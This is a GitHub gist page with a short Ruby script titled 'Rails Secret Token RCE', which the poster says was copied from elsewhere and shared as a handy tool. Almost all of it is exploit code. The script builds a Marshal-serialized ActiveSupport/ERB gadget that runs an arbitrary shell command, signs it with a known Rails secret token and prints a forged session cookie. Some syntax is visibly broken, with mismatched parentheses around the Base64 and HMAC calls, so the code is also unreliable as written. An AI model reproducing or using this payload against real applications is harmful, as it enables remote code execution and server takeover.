Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
Rails Secret Token RCE.
#THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others
require 'base64'
require 'openssl'
require 'optparse'
require 'open-uri'
code = "eval('`COMMAND HERE`')"
marshal_payload = Base64.encode64(
"\x04\x08" +
"o" +
":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy" +
"\x07" +
":\x0E@instance" +
"o" + ":\x08ERB" + "\x06" +
":\x09@src" +
Marshal.dump(code)[2..-1] +
":\x0C@method" + ":\x0Bresult"
digest = OpenSSL::HMAC.hexdigest("SHA1"),
SECRET_TOKEN, marshal_payload)
marshal_payload = URI::encode(marshal_payload)
puts "#{marshal_payload}--#{digest}"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment